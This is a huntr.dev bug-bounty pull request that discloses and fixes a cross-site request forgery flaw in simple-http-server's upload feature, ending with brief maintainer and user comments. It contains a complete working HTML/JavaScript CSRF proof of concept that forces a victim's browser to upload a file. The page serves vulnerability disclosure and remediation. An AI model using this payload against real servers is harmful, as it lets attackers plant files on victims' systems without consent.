Security Fix for Cross Site Request Forgery (CSRF) - huntr.dev

[huntr-helper]

@doshmajhan (https://huntr.dev/users/doshmajhan) has fixed a potential Cross Site Request Forgery (CSRF) vulnerability in your repository 🔨. For more information, visit our website (https://huntr.dev/) or click the bounty URL below...

Q | A
Version Affected | *
Bug Fix | YES
Original Pull Request | 418sec#1

If you are happy with this disclosure, we would love to get a CVE assigned to the vulnerability. Feel free to credit @doshmajhan, the discloser found in the bounty URL (below) and @huntr-helper.

User Comments:

📊 Metadata *

Bounty URL: https://huntr.dev/bounties/1-other-simple-http-server

⚙️ Description *

The 'upload' feature in simple-http-server is vulnerable to cross-site request forgery, it doesn't authenticate the user and just uploads the files which are given to it. If the upload feature is enabled, it can allow attackers to craft web pages and if victims interact with attackers' web pages then a cross-site request can be sent to the website by simple-http-server and a file can be uploaded on behalf of the victim.

The change here generates a CSRF token when the --upload flag is passed and displays it to the user as well as embedding it in the HTML page for the directory listing. If the csrf parameter is not passed or does not match the generated one when uploading a file, the request will be rejected with a 400.

🐛 Proof of Concept (PoC) *

Start a web server with --upload as an argument that enables uploading functionality.
Save the following PoC.html and open it in a browser.
Click on "Submit Request".
Observe that a file was uploaded, you can check the webroot and see the newly uploaded file.
In this process, authentication wasn't required and with minimal user interaction, a file can be uploaded on behalf of the victim.

<!-- PoC.html -->

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------355111547139502215671973431497");
        xhr.withCredentials = true;
        var body = "-----------------------------355111547139502215671973431497\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"file.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "hello pwned\r\n\r\n" + 
          "-----------------------------355111547139502215671973431497--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

🔥 Proof of Fix (PoF) *

In the attached screenshot you'll see that the request generated by clicking Submit Request in the PoC.html failed with a 400 due to not providing a CSRF token.

[TheWaWaR]

Thanks

[dw5]

i hate this commit. makes powershell file upload impossible. also such simple server is used on LANs, i doubt CSRF is needed.
Literally have to use transfer.sh for simple automated file upload